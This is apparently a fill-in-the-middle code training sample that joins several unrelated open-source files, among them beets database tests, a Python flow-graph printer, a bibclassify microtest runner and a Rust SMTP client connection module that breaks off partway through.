if step.Meta.name == active_step_name: indent = " => " else: indent = " " print("{indent}{step}{flags:4}".format( indent=indent, flags=rendered_flags, step=step.Meta.label ), file=file) needs_header = False for s_k, s_v in step.__dict__.items(): if s_k.startswith("_"): continue # skip Meta if s_k == 'Meta': continue if needs_header: print("STATE:", file=file) needs_header = False print("{indent}{key}: {value!r}".format( indent=" " * 8, key=s_k, value=s_v ), file=file) print("." * 40, file=file) def print_dot_graph(flow, active_step_name=None, file=sys.stdout): """ Print the dot(1) description of a given flow. :param flow: A Flow, instance or class :param active_step_name: (optional) name of the active step :param file: (optional) file to print to (defaults to sys.stdout) """ print('digraph {', file=file) print('\tnode [shape=box, color=black];', file=file) print('\tedge [arrowsize=0.5];', file=file) print(file=file) print('\tsubgraph {', file=file) print('\t\tnode [shape=plaintext];', file=file) # NOTE: levels + 2 because 0 and max are # for _start and _end that are not # represented anywhere in the flow. We # just add them for graphviz print('\t\t{};'.format( ' -> '.join(str(i) for i in range(flow.Meta.levels + 2)) ), file=file) print('\t}', file=file) print(file=file) # NOTE: levels + 2 as above levels = {i: [] for i in range(flow.Meta.levels + 2)} levels[0].append('_start') # NOTE: levels + 1 is the last element levels[flow.Meta.levels + 1].append('_end') for step in flow.Meta.steps.values(): levels[step.Meta.level].append(step.Meta.name) for level, steps in sorted(levels.items()): print('\t{{ rank=same; {}; {}; }}'.format( level, '; '.join(steps) ), file=file) print(file=file) if active_step_name == '_start': print('\t_start [shape=circle, style=filled,' ' fillcolor=blue, label=""];', file=file) else: print('\t_start [shape=circle, style=filled,' ' fillcolor=black, label=""];', file=file) for step in flow.Meta.steps.values(): if step.Meta.initial: print('\t_start -> {};'.format(step.Meta.name), file=file) print(file=file) for step in flow.Meta.steps.values(): if active_step_name == step.Meta.name: print('\t{} [shape={}, label="{}", style=filled, fillcolor=blue, fontcolor=white];'.format( step.Meta.name, "box", step.Meta.label.replace('"', '\\"') ), file=file) else: print('\t{} [shape={}, label="{}"];'.format( step.Meta.name, "box", step.Meta.label.replace('"', '\\"') ), file=file) for arrow in step.Meta.arrows: if isinstance(arrow, NormalArrow): print('\t{} -> {};'.format( step.Meta.name, arrow.target ), file=file) elif isinstance(arrow, ValueArrow): print('\t{} -> {} [label="{}", color=green];'.format( step.Meta.name, arrow.target, arrow.value ), file=file) elif isinstance(arrow, ErrorArrow): print('\t{} -> {} [label="{}", color=red];'.format( step.Meta.name, arrow.target, arrow.error.__name__ ), file=file) print(file=file) if active_step_name == '_end': print('\t_end [shape=doublecircle, style=filled, ' 'fillcolor=blue, label=""];', file=file) else: print('\t_end [shape=doublecircle, style=filled, ' 'fillcolor=black, label=""];', file=file) for step in flow.Meta.steps.values(): if step.Meta.accepting: print('\t{} -> _end;'.format(step.Meta.name), file=file) print("}", file=file)<|fim▁end|>
:param flow: A Flow, instance or class :param active_step_name:
<|file_name|>tsd.d.ts<|end_file_name|><|fim▁begin|>/// <reference path="empower/empower.d.ts" /> /// <reference path="mocha/mocha.d.ts" /> /// <reference path="power-assert-formatter/power-assert-formatter.d.ts" /> /// <reference path="power-assert/power-assert.d.ts" /> /// <reference path="node/node.d.ts" /><|fim▁hole|> declare module 'vdom-parser' { var parse: any; export default parse; } declare module 'matches-selector' { var selector: any; export default selector; }<|fim▁end|>
/// <reference path="virtual-dom/virtual-dom.d.ts" />
<|file_name|>callbacks.js<|end_file_name|><|fim▁begin|>function alertThanks (post) { alert("Thanks for submitting a post!"); return post; }<|fim▁hole|><|fim▁end|>
Telescope.callbacks.add("postSubmitClient", alertThanks);
<|file_name|>test_dbcore.py<|end_file_name|><|fim▁begin|># This file is part of beets. # Copyright 2016, Adrian Sampson. # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. """Tests for the DBCore database abstraction. """ import os import shutil import sqlite3 import unittest from test import _common from beets import dbcore from tempfile import mkstemp # Fixture: concrete database and model classes. For migration tests, we # have multiple models with different numbers of fields. class SortFixture(dbcore.query.FieldSort): pass class QueryFixture(dbcore.query.Query): def __init__(self, pattern): self.pattern = pattern def clause(self): return None, () def match(self): return True class ModelFixture1(dbcore.Model): _table = 'test' _flex_table = 'testflex' _fields = { 'id': dbcore.types.PRIMARY_ID, 'field_one': dbcore.types.INTEGER, 'field_two': dbcore.types.STRING, } _types = { 'some_float_field': dbcore.types.FLOAT, } _sorts = { 'some_sort': SortFixture, } _queries = { 'some_query': QueryFixture, } @classmethod def _getters(cls): return {} def _template_funcs(self): return {} class DatabaseFixture1(dbcore.Database): _models = (ModelFixture1,) pass class ModelFixture2(ModelFixture1): _fields = { 'id': dbcore.types.PRIMARY_ID, 'field_one': dbcore.types.INTEGER, 'field_two': dbcore.types.INTEGER, } class DatabaseFixture2(dbcore.Database): _models = (ModelFixture2,) pass class ModelFixture3(ModelFixture1): _fields = { 'id': dbcore.types.PRIMARY_ID, 'field_one': dbcore.types.INTEGER, 'field_two': dbcore.types.INTEGER, 'field_three': dbcore.types.INTEGER, } class DatabaseFixture3(dbcore.Database): _models = (ModelFixture3,) pass class ModelFixture4(ModelFixture1): _fields = { 'id': dbcore.types.PRIMARY_ID, 'field_one': dbcore.types.INTEGER, 'field_two': dbcore.types.INTEGER, 'field_three': dbcore.types.INTEGER, 'field_four': dbcore.types.INTEGER, } class DatabaseFixture4(dbcore.Database): _models = (ModelFixture4,) pass class AnotherModelFixture(ModelFixture1): _table = 'another' _flex_table = 'anotherflex' _fields = { 'id': dbcore.types.PRIMARY_ID, 'foo': dbcore.types.INTEGER, } class ModelFixture5(ModelFixture1): _fields = { 'some_string_field': dbcore.types.STRING, 'some_float_field': dbcore.types.FLOAT, 'some_boolean_field': dbcore.types.BOOLEAN, } class DatabaseFixture5(dbcore.Database): _models = (ModelFixture5,) pass class DatabaseFixtureTwoModels(dbcore.Database): _models = (ModelFixture2, AnotherModelFixture) pass class ModelFixtureWithGetters(dbcore.Model): @classmethod def _getters(cls): return {'aComputedField': (lambda s: 'thing')} def _template_funcs(self): return {} @_common.slow_test() class MigrationTest(unittest.TestCase): """Tests the ability to change the database schema between versions. """ @classmethod def setUpClass(cls): handle, cls.orig_libfile = mkstemp('orig_db') os.close(handle) # Set up a database with the two-field schema. old_lib = DatabaseFixture2(cls.orig_libfile) # Add an item to the old library. old_lib._connection().execute( 'insert into test (field_one, field_two) values (4, 2)' ) old_lib._connection().commit() del old_lib @classmethod def tearDownClass(cls): os.remove(cls.orig_libfile) def setUp(self): handle, self.libfile = mkstemp('db') os.close(handle) shutil.copyfile(self.orig_libfile, self.libfile) def tearDown(self): os.remove(self.libfile) def test_open_with_same_fields_leaves_untouched(self): new_lib = DatabaseFixture2(self.libfile) c = new_lib._connection().cursor() c.execute("select * from test") row = c.fetchone() self.assertEqual(len(row.keys()), len(ModelFixture2._fields)) def test_open_with_new_field_adds_column(self): new_lib = DatabaseFixture3(self.libfile) c = new_lib._connection().cursor() c.execute("select * from test") row = c.fetchone() self.assertEqual(len(row.keys()), len(ModelFixture3._fields)) def test_open_with_fewer_fields_leaves_untouched(self): new_lib = DatabaseFixture1(self.libfile) c = new_lib._connection().cursor() c.execute("select * from test") row = c.fetchone() self.assertEqual(len(row.keys()), len(ModelFixture2._fields)) def test_open_with_multiple_new_fields(self): new_lib = DatabaseFixture4(self.libfile) c = new_lib._connection().cursor() c.execute("select * from test") row = c.fetchone() self.assertEqual(len(row.keys()), len(ModelFixture4._fields)) def test_extra_model_adds_table(self): new_lib = DatabaseFixtureTwoModels(self.libfile) try: new_lib._connection().execute("select * from another") except sqlite3.OperationalError: self.fail("select failed") class TransactionTest(unittest.TestCase): def setUp(self): self.db = DatabaseFixture1(':memory:') def tearDown(self): self.db._connection().close() def test_mutate_increase_revision(self): old_rev = self.db.revision with self.db.transaction() as tx: tx.mutate( 'INSERT INTO {} ' '(field_one) ' 'VALUES (?);'.format(ModelFixture1._table), (111,), ) self.assertGreater(self.db.revision, old_rev) def test_query_no_increase_revision(self): old_rev = self.db.revision with self.db.transaction() as tx: tx.query('PRAGMA table_info(%s)' % ModelFixture1._table) self.assertEqual(self.db.revision, old_rev) class ModelTest(unittest.TestCase): def setUp(self): self.db = DatabaseFixture1(':memory:') def tearDown(self): self.db._connection().close() def test_add_model(self): model = ModelFixture1() model.add(self.db) rows = self.db._connection().execute('select * from test').fetchall() self.assertEqual(len(rows), 1) def test_store_fixed_field(self): model = ModelFixture1() model.add(self.db) model.field_one = 123 model.store() row = self.db._connection().execute('select * from test').fetchone() self.assertEqual(row['field_one'], 123) def test_revision(self): old_rev = self.db.revision model = ModelFixture1() model.add(self.db) model.store() self.assertEqual(model._revision, self.db.revision) self.assertGreater(self.db.revision, old_rev) mid_rev = self.db.revision model2 = ModelFixture1() model2.add(self.db) model2.store() self.assertGreater(model2._revision, mid_rev) self.assertGreater(self.db.revision, model._revision) # revision changed, so the model should be re-loaded model.load() self.assertEqual(model._revision, self.db.revision) # revision did not change, so no reload mod2_old_rev = model2._revision model2.load() self.assertEqual(model2._revision, mod2_old_rev) def test_retrieve_by_id(self): model = ModelFixture1() model.add(self.db) other_model = self.db._get(ModelFixture1, model.id) self.assertEqual(model.id, other_model.id) def test_store_and_retrieve_flexattr(self): model = ModelFixture1() model.add(self.db) model.foo = 'bar' model.store() other_model = self.db._get(ModelFixture1, model.id) self.assertEqual(other_model.foo, 'bar') def test_delete_flexattr(self): model = ModelFixture1() model['foo'] = 'bar' self.assertTrue('foo' in model) del model['foo'] self.assertFalse('foo' in model) def test_delete_flexattr_via_dot(self): model = ModelFixture1() model['foo'] = 'bar' self.assertTrue('foo' in model) del model.foo self.assertFalse('foo' in model) def test_delete_flexattr_persists(self): model = ModelFixture1() model.add(self.db) model.foo = 'bar' model.store() model = self.db._get(ModelFixture1, model.id) del model['foo'] model.store() model = self.db._get(ModelFixture1, model.id) self.assertFalse('foo' in model) def test_delete_non_existent_attribute(self): model = ModelFixture1() with self.assertRaises(KeyError): del model['foo'] def test_delete_fixed_attribute(self): model = ModelFixture5() model.some_string_field = 'foo' model.some_float_field = 1.23 model.some_boolean_field = True for field, type_ in model._fields.items(): self.assertNotEqual(model[field], type_.null) for field, type_ in model._fields.items(): del model[field] self.assertEqual(model[field], type_.null) def test_null_value_normalization_by_type(self): model = ModelFixture1() model.field_one = None self.assertEqual(model.field_one, 0) def test_null_value_stays_none_for_untyped_field(self): model = ModelFixture1() model.foo = None self.assertEqual(model.foo, None) def test_normalization_for_typed_flex_fields(self): model = ModelFixture1() model.some_float_field = None self.assertEqual(model.some_float_field, 0.0) def test_load_deleted_flex_field(self): model1 = ModelFixture1() model1['flex_field'] = True model1.add(self.db) model2 = self.db._get(ModelFixture1, model1.id) self.assertIn('flex_field', model2) del model1['flex_field'] model1.store() model2.load() self.assertNotIn('flex_field', model2) def test_check_db_fails(self): with self.assertRaisesRegex(ValueError, 'no database'): dbcore.Model()._check_db() with self.assertRaisesRegex(ValueError, 'no id'): ModelFixture1(self.db)._check_db() dbcore.Model(self.db)._check_db(need_id=False) def test_missing_field(self): with self.assertRaises(AttributeError): ModelFixture1(self.db).nonExistingKey def test_computed_field(self): model = ModelFixtureWithGetters() self.assertEqual(model.aComputedField, 'thing') with self.assertRaisesRegex(KeyError, 'computed field .+ deleted'): del model.aComputedField def test_items(self): model = ModelFixture1(self.db) model.id = 5 self.assertEqual({('id', 5), ('field_one', 0), ('field_two', '')}, set(model.items())) def test_delete_internal_field(self): model = dbcore.Model() del model._db with self.assertRaises(AttributeError): model._db def test_parse_nonstring(self): with self.assertRaisesRegex(TypeError, "must be a string"): dbcore.Model._parse(None, 42) class FormatTest(unittest.TestCase): def test_format_fixed_field_integer(self): model = ModelFixture1() model.field_one = 155 value = model.formatted().get('field_one') self.assertEqual(value, '155') def test_format_fixed_field_integer_normalized(self): """The normalize method of the Integer class rounds floats """ model = ModelFixture1() model.field_one = 142.432 value = model.formatted().get('field_one') self.assertEqual(value, '142') model.field_one = 142.863 value = model.formatted().get('field_one') self.assertEqual(value, '143') def test_format_fixed_field_string(self): model = ModelFixture1() model.field_two = 'caf\xe9' value = model.formatted().get('field_two') self.assertEqual(value, 'caf\xe9') def test_format_flex_field(self): model = ModelFixture1() model.other_field = 'caf\xe9' value = model.formatted().get('other_field') self.assertEqual(value, 'caf\xe9') def test_format_flex_field_bytes(self): model = ModelFixture1() model.other_field = 'caf\xe9'.encode() value = model.formatted().get('other_field') self.assertTrue(isinstance(value, str)) self.assertEqual(value, 'caf\xe9') def test_format_unset_field(self): model = ModelFixture1() value = model.formatted().get('other_field') self.assertEqual(value, '') def test_format_typed_flex_field(self): model = ModelFixture1() model.some_float_field = 3.14159265358979 value = model.formatted().get('some_float_field') self.assertEqual(value, '3.1') class FormattedMappingTest(unittest.TestCase): def test_keys_equal_model_keys(self): model = ModelFixture1() formatted = model.formatted() self.assertEqual(set(model.keys(True)), set(formatted.keys())) def test_get_unset_field(self): model = ModelFixture1() formatted = model.formatted() with self.assertRaises(KeyError): formatted['other_field'] def test_get_method_with_default(self): model = ModelFixture1() formatted = model.formatted() self.assertEqual(formatted.get('other_field'), '') def test_get_method_with_specified_default(self): model = ModelFixture1() formatted = model.formatted() self.assertEqual(formatted.get('other_field', 'default'), 'default') class ParseTest(unittest.TestCase): def test_parse_fixed_field(self): value = ModelFixture1._parse('field_one', '2') self.assertIsInstance(value, int) self.assertEqual(value, 2) def test_parse_flex_field(self): value = ModelFixture1._parse('some_float_field', '2') self.assertIsInstance(value, float) self.assertEqual(value, 2.0) def test_parse_untyped_field(self): value = ModelFixture1._parse('field_nine', '2') self.assertEqual(value, '2') class QueryParseTest(unittest.TestCase): def pqp(self, part): return dbcore.queryparse.parse_query_part( part, {'year': dbcore.query.NumericQuery}, {':': dbcore.query.RegexpQuery}, )[:-1] # remove the negate flag def test_one_basic_term(self): q = 'test' r = (None, 'test', dbcore.query.SubstringQuery) self.assertEqual(self.pqp(q), r) def test_one_keyed_term(self): q = 'test:val' r = ('test', 'val', dbcore.query.SubstringQuery) self.assertEqual(self.pqp(q), r) def test_colon_at_end(self): q = 'test:' r = ('test', '', dbcore.query.SubstringQuery) self.assertEqual(self.pqp(q), r) def test_one_basic_regexp(self): q = r':regexp' r = (None, 'regexp', dbcore.query.RegexpQuery) self.assertEqual(self.pqp(q), r) def test_keyed_regexp(self): q = r'test::regexp' r = ('test', 'regexp', dbcore.query.RegexpQuery) self.assertEqual(self.pqp(q), r) def test_escaped_colon(self): q = r'test\:val' r = (None, 'test:val', dbcore.query.SubstringQuery) self.assertEqual(self.pqp(q), r) def test_escaped_colon_in_regexp(self): q = r':test\:regexp' r = (None, 'test:regexp', dbcore.query.RegexpQuery) self.assertEqual(self.pqp(q), r) def test_single_year(self): q = 'year:1999' r = ('year', '1999', dbcore.query.NumericQuery) self.assertEqual(self.pqp(q), r) def test_multiple_years(self): q = 'year:1999..2010' r = ('year', '1999..2010', dbcore.query.NumericQuery) self.assertEqual(self.pqp(q), r) def test_empty_query_part(self):<|fim▁hole|> class QueryFromStringsTest(unittest.TestCase): def qfs(self, strings): return dbcore.queryparse.query_from_strings( dbcore.query.AndQuery, ModelFixture1, {':': dbcore.query.RegexpQuery}, strings, ) def test_zero_parts(self): q = self.qfs([]) self.assertIsInstance(q, dbcore.query.AndQuery) self.assertEqual(len(q.subqueries), 1) self.assertIsInstance(q.subqueries[0], dbcore.query.TrueQuery) def test_two_parts(self): q = self.qfs(['foo', 'bar:baz']) self.assertIsInstance(q, dbcore.query.AndQuery) self.assertEqual(len(q.subqueries), 2) self.assertIsInstance(q.subqueries[0], dbcore.query.AnyFieldQuery) self.assertIsInstance(q.subqueries[1], dbcore.query.SubstringQuery) def test_parse_fixed_type_query(self): q = self.qfs(['field_one:2..3']) self.assertIsInstance(q.subqueries[0], dbcore.query.NumericQuery) def test_parse_flex_type_query(self): q = self.qfs(['some_float_field:2..3']) self.assertIsInstance(q.subqueries[0], dbcore.query.NumericQuery) def test_empty_query_part(self): q = self.qfs(['']) self.assertIsInstance(q.subqueries[0], dbcore.query.TrueQuery) def test_parse_named_query(self): q = self.qfs(['some_query:foo']) self.assertIsInstance(q.subqueries[0], QueryFixture) class SortFromStringsTest(unittest.TestCase): def sfs(self, strings): return dbcore.queryparse.sort_from_strings( ModelFixture1, strings, ) def test_zero_parts(self): s = self.sfs([]) self.assertIsInstance(s, dbcore.query.NullSort) self.assertEqual(s, dbcore.query.NullSort()) def test_one_parts(self): s = self.sfs(['field+']) self.assertIsInstance(s, dbcore.query.Sort) def test_two_parts(self): s = self.sfs(['field+', 'another_field-']) self.assertIsInstance(s, dbcore.query.MultipleSort) self.assertEqual(len(s.sorts), 2) def test_fixed_field_sort(self): s = self.sfs(['field_one+']) self.assertIsInstance(s, dbcore.query.FixedFieldSort) self.assertEqual(s, dbcore.query.FixedFieldSort('field_one')) def test_flex_field_sort(self): s = self.sfs(['flex_field+']) self.assertIsInstance(s, dbcore.query.SlowFieldSort) self.assertEqual(s, dbcore.query.SlowFieldSort('flex_field')) def test_special_sort(self): s = self.sfs(['some_sort+']) self.assertIsInstance(s, SortFixture) class ParseSortedQueryTest(unittest.TestCase): def psq(self, parts): return dbcore.parse_sorted_query( ModelFixture1, parts.split(), ) def test_and_query(self): q, s = self.psq('foo bar') self.assertIsInstance(q, dbcore.query.AndQuery) self.assertIsInstance(s, dbcore.query.NullSort) self.assertEqual(len(q.subqueries), 2) def test_or_query(self): q, s = self.psq('foo , bar') self.assertIsInstance(q, dbcore.query.OrQuery) self.assertIsInstance(s, dbcore.query.NullSort) self.assertEqual(len(q.subqueries), 2) def test_no_space_before_comma_or_query(self): q, s = self.psq('foo, bar') self.assertIsInstance(q, dbcore.query.OrQuery) self.assertIsInstance(s, dbcore.query.NullSort) self.assertEqual(len(q.subqueries), 2) def test_no_spaces_or_query(self): q, s = self.psq('foo,bar') self.assertIsInstance(q, dbcore.query.AndQuery) self.assertIsInstance(s, dbcore.query.NullSort) self.assertEqual(len(q.subqueries), 1) def test_trailing_comma_or_query(self): q, s = self.psq('foo , bar ,') self.assertIsInstance(q, dbcore.query.OrQuery) self.assertIsInstance(s, dbcore.query.NullSort) self.assertEqual(len(q.subqueries), 3) def test_leading_comma_or_query(self): q, s = self.psq(', foo , bar') self.assertIsInstance(q, dbcore.query.OrQuery) self.assertIsInstance(s, dbcore.query.NullSort) self.assertEqual(len(q.subqueries), 3) def test_only_direction(self): q, s = self.psq('-') self.assertIsInstance(q, dbcore.query.AndQuery) self.assertIsInstance(s, dbcore.query.NullSort) self.assertEqual(len(q.subqueries), 1) class ResultsIteratorTest(unittest.TestCase): def setUp(self): self.db = DatabaseFixture1(':memory:') model = ModelFixture1() model['foo'] = 'baz' model.add(self.db) model = ModelFixture1() model['foo'] = 'bar' model.add(self.db) def tearDown(self): self.db._connection().close() def test_iterate_once(self): objs = self.db._fetch(ModelFixture1) self.assertEqual(len(list(objs)), 2) def test_iterate_twice(self): objs = self.db._fetch(ModelFixture1) list(objs) self.assertEqual(len(list(objs)), 2) def test_concurrent_iterators(self): results = self.db._fetch(ModelFixture1) it1 = iter(results) it2 = iter(results) next(it1) list(it2) self.assertEqual(len(list(it1)), 1) def test_slow_query(self): q = dbcore.query.SubstringQuery('foo', 'ba', False) objs = self.db._fetch(ModelFixture1, q) self.assertEqual(len(list(objs)), 2) def test_slow_query_negative(self): q = dbcore.query.SubstringQuery('foo', 'qux', False) objs = self.db._fetch(ModelFixture1, q) self.assertEqual(len(list(objs)), 0) def test_iterate_slow_sort(self): s = dbcore.query.SlowFieldSort('foo') res = self.db._fetch(ModelFixture1, sort=s) objs = list(res) self.assertEqual(objs[0].foo, 'bar') self.assertEqual(objs[1].foo, 'baz') def test_unsorted_subscript(self): objs = self.db._fetch(ModelFixture1) self.assertEqual(objs[0].foo, 'baz') self.assertEqual(objs[1].foo, 'bar') def test_slow_sort_subscript(self): s = dbcore.query.SlowFieldSort('foo') objs = self.db._fetch(ModelFixture1, sort=s) self.assertEqual(objs[0].foo, 'bar') self.assertEqual(objs[1].foo, 'baz') def test_length(self): objs = self.db._fetch(ModelFixture1) self.assertEqual(len(objs), 2) def test_out_of_range(self): objs = self.db._fetch(ModelFixture1) with self.assertRaises(IndexError): objs[100] def test_no_results(self): self.assertIsNone(self.db._fetch( ModelFixture1, dbcore.query.FalseQuery()).get()) def suite(): return unittest.TestLoader().loadTestsFromName(__name__) if __name__ == '__main__': unittest.main(defaultTest='suite')<|fim▁end|>
q = '' r = (None, '', dbcore.query.SubstringQuery) self.assertEqual(self.pqp(q), r)
<|file_name|>dnsaaaarecordnotfoundexception.py<|end_file_name|><|fim▁begin|># -*- coding:utf-8 -*- from ...errors.httpbadrequestexception import HttpBadRequestException import saklient # module saklient.cloud.errors.dnsaaaarecordnotfoundexception<|fim▁hole|> ## @param {int} status # @param {str} code=None # @param {str} message="" def __init__(self, status, code=None, message=""): super(DnsAaaaRecordNotFoundException, self).__init__(status, code, "不適切な要求です。対応するAAAAレコードが見つかりません。" if message is None or message == "" else message)<|fim▁end|>
class DnsAaaaRecordNotFoundException(HttpBadRequestException): ## 不適切な要求です。対応するAAAAレコードが見つかりません。
<|file_name|>bibclassify_microtests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- """Module for running microtests on how well the extraction works - this module is STANDALONE safe""" import ConfigParser import glob import traceback import codecs import bibclassify_config as bconfig import bibclassify_engine as engine log = bconfig.get_logger("bibclassify.microtest") def run(glob_patterns, verbose=20, plevel = 1 ): """Execute microtests""" if verbose is not None: log.setLevel(int(verbose)) results = {} for pattern in glob_patterns: log.info("Looking for microtests: %s" % pattern) for cfgfile in glob.glob(pattern): log.debug("processing: %s" % (cfgfile)) try: test_cases = load_microtest_definition(cfgfile) run_microtest_suite(test_cases, results=results, plevel=plevel) except Exception, msg: log.error('Error running microtest: %s' % cfgfile) log.error(msg) log.error(traceback.format_exc()) summarize_results(results, plevel) def run_microtest_suite(test_cases, results={}, plevel=1): """Runs all tests from the test_case @var test_cases: microtest definitions @keyword results: dict, where results are cummulated @keyword plevel: int [0..1], performance level, results below the plevel are considered unsuccessful @return: nothing """ config = {} if 'config' in test_cases: config = test_cases['config'] del(test_cases['config']) if 'taxonomy' not in config: config['taxonomy'] = ['HEP'] for test_name in sorted(test_cases.keys()): test = test_cases[test_name] try: log.debug('section: %s' % test_name) phrase = test['phrase'][0] (skw, ckw, akw, acr) = engine.get_keywords_from_text(test['phrase'], config['taxonomy'][0], output_mode="raw") details = analyze_results(test, (skw, ckw) ) if details["plevel"] < plevel: log.error("\n" + format_test_case(test)) log.error("results\n" + format_details(details)) else: log.info("Success for section: %s" % (test_name)) log.info("\n" + format_test_case(test)) if plevel != 1: log.info("results\n" + format_details(details)) results.setdefault(test_name, []) results[test_name].append(details) except Exception, msg: log.error('Operational error executing section: %s' % test_name) #log.error(msg) log.error(traceback.format_exc()) def summarize_results(results, plevel): total = 0 success = 0 for k,v in results.items(): total += len(v) success += len(filter(lambda x: x["plevel"] >= plevel, v)) log.info("Total number of micro-tests run: %s" % total) log.info("Success/failure: %d/%d" % (success, total-success)) def format_details(details): plevel = details["plevel"] details["plevel"] = [plevel] out = format_test_case(details) details["plevel"] = plevel return out def format_test_case(test_case): padding = 13 keys = ["phrase", "expected", "unwanted"] out = ["" for x in range(len(keys))] out2 = [] for key in test_case.keys(): phrase = "\n".join(map(lambda x: (" " * (padding + 1) ) + str(x), test_case[key])) if key in keys: out[keys.index(key)] = "%s=%s" % (key.rjust(padding-1), phrase[padding:]) else: out2.append("%s=%s" % (key.rjust(padding-1), phrase[padding:])) if filter(len, out) and filter(len, out2): return "%s\n%s" % ("\n".join(filter(len, out)), "\n".join(out2)) else: return "%s%s" % ("\n".join(filter(len, out)), "\n".join(out2)) def analyze_results(test_case, results): skw = results[0] ckw = results[1] details = {"correct" : [], "incorrect": [], "plevel" : 0} responses_total = len(skw) + len(ckw) expected_total = len(test_case["expected"]) correct_responses = 0 incorrect_responses = 0 for result_set in (skw, ckw): for r in result_set: try: val = r[0].output() except: val = r.output() if r in test_case["expected"]: correct_responses += 1 details["correct"].append(val) else: incorrect_responses += 1 details["incorrect"].append(val) details["plevel"] = ((responses_total + expected_total) - incorrect_responses) / (responses_total + expected_total) return details def load_microtest_definition(cfgfile, **kwargs): """Loads data from the microtest definition file { section-1: phrase: [ some-string] expected: [some, string] unwanted: [some-string] section-2: ..... } """ config = {} cfg = ConfigParser.ConfigParser() fo = codecs.open(cfgfile, 'r', 'utf-8') cfg.readfp(fo, filename=cfgfile) for s in cfg.sections(): if s in config: log.error('two sections with the same name') config[s] = {} for k, v in cfg.items(s): if "\n" in v: v = filter(len, v.splitlines()) else: v = [v.strip()] if k not in config[s]: config[s][k] = [] config[s][k] += v fo.close() return config if __name__ == "__main__": import os, sys test_paths = [] if len(sys.argv) > 1 and sys.argv[1] == "demo": test_paths.append(os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), "bibclassify/microtest*.cfg"))) test_paths.append(os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), "../../../etc/bibclassify/microtest*.cfg"))) run(test_paths)<|fim▁hole|> test_paths.append(p) else: # try to detect if we shall prepend rootdir first = p.split(os.path.sep)[0] if os.path.exists(first): #probably relative path test_paths.append(p) elif (os.path.join(bconfig.CFG_PREFIX, first)): #relative to root test_paths.append(os.path.join(bconfig.CFG_PREFIX, p)) log.warning('Resolving relative path %s -> %s' % (p, test_paths[-1])) else: raise Exception ('Please check the glob pattern: %s\n\ it seems to be a relative path, but not relative to the script, nor to the invenio rootdir' % p) run(test_paths) else: print 'Usage: %s glob_pattern [glob_pattern...]\nExample: %s %s/etc/bibclassify/microtest*.cfg' % (sys.argv[0], sys.argv[0], bconfig.CFG_PREFIX, )<|fim▁end|>
elif (len(sys.argv) > 1): for p in sys.argv[1:]: if p[0] == os.path.sep: # absolute path
<|file_name|>connection.rs<|end_file_name|><|fim▁begin|>use std::{ fmt::Display, io::{self, BufRead, BufReader, Write}, net::ToSocketAddrs, time::Duration, }; use super::{ClientCodec, NetworkStream, TlsParameters}; use crate::{ address::Envelope, transport::smtp::{ authentication::{Credentials, Mechanism}, commands::*, error, error::Error, extension::{ClientId, Extension, MailBodyParameter, MailParameter, ServerInfo}, response::{parse_response, Response}, }, }; #[cfg(feature = "tracing")] use super::escape_crlf; macro_rules! try_smtp ( ($err: expr, $client: ident) => ({ match $err { Ok(val) => val, Err(err) => { $client.abort(); return Err(From::from(err)) }, } }) ); /// Structure that implements the SMTP client pub struct SmtpConnection { /// TCP stream between client and server /// Value is None before connection stream: BufReader<NetworkStream>, /// Panic state panic: bool, /// Information about the server server_info: ServerInfo, } impl SmtpConnection { pub fn server_info(&self) -> &ServerInfo { &self.server_info } // FIXME add simple connect and rename this one /// Connects to the configured server /// /// Sends EHLO and parses server information pub fn connect<A: ToSocketAddrs>( server: A, timeout: Option<Duration>, hello_name: &ClientId, tls_parameters: Option<&TlsParameters>, ) -> Result<SmtpConnection, Error> { let stream = NetworkStream::connect(server, timeout, tls_parameters)?; let stream = BufReader::new(stream); let mut conn = SmtpConnection { stream, panic: false, server_info: ServerInfo::default(), }; conn.set_timeout(timeout).map_err(error::network)?; // TODO log let _response = conn.read_response()?; conn.ehlo(hello_name)?; // Print server information #[cfg(feature = "tracing")] tracing::debug!("server {}", conn.server_info); Ok(conn) } <|fim▁hole|> // Internationalization handling // // * 8BITMIME: https://tools.ietf.org/html/rfc6152 // * SMTPUTF8: https://tools.ietf.org/html/rfc653 // Check for non-ascii addresses and use the SMTPUTF8 option if any. if envelope.has_non_ascii_addresses() { if !self.server_info().supports_feature(Extension::SmtpUtfEight) { // don't try to send non-ascii addresses (per RFC) return Err(error::client( "Envelope contains non-ascii chars but server does not support SMTPUTF8", )); } mail_options.push(MailParameter::SmtpUtfEight); } // Check for non-ascii content in message if !email.is_ascii() { if !self.server_info().supports_feature(Extension::EightBitMime) { return Err(error::client( "Message contains non-ascii chars but server does not support 8BITMIME", )); } mail_options.push(MailParameter::Body(MailBodyParameter::EightBitMime)); } try_smtp!( self.command(Mail::new(envelope.from().cloned(), mail_options)), self ); // Recipient for to_address in envelope.to() { try_smtp!(self.command(Rcpt::new(to_address.clone(), vec![])), self); } // Data try_smtp!(self.command(Data), self); // Message content let result = try_smtp!(self.message(email), self); Ok(result) } pub fn has_broken(&self) -> bool { self.panic } pub fn can_starttls(&self) -> bool { !self.is_encrypted() && self.server_info.supports_feature(Extension::StartTls) } #[allow(unused_variables)] pub fn starttls( &mut self, tls_parameters: &TlsParameters, hello_name: &ClientId, ) -> Result<(), Error> { if self.server_info.supports_feature(Extension::StartTls) { #[cfg(any(feature = "native-tls", feature = "rustls-tls"))] { try_smtp!(self.command(Starttls), self); self.stream.get_mut().upgrade_tls(tls_parameters)?; #[cfg(feature = "tracing")] tracing::debug!("connection encrypted"); // Send EHLO again try_smtp!(self.ehlo(hello_name), self); Ok(()) } #[cfg(not(any(feature = "native-tls", feature = "rustls-tls")))] // This should never happen as `Tls` can only be created // when a TLS library is enabled unreachable!("TLS support required but not supported"); } else { Err(error::client("STARTTLS is not supported on this server")) } } /// Send EHLO and update server info fn ehlo(&mut self, hello_name: &ClientId) -> Result<(), Error> { let ehlo_response = try_smtp!(self.command(Ehlo::new(hello_name.clone())), self); self.server_info = try_smtp!(ServerInfo::from_response(&ehlo_response), self); Ok(()) } pub fn quit(&mut self) -> Result<Response, Error> { Ok(try_smtp!(self.command(Quit), self)) } pub fn 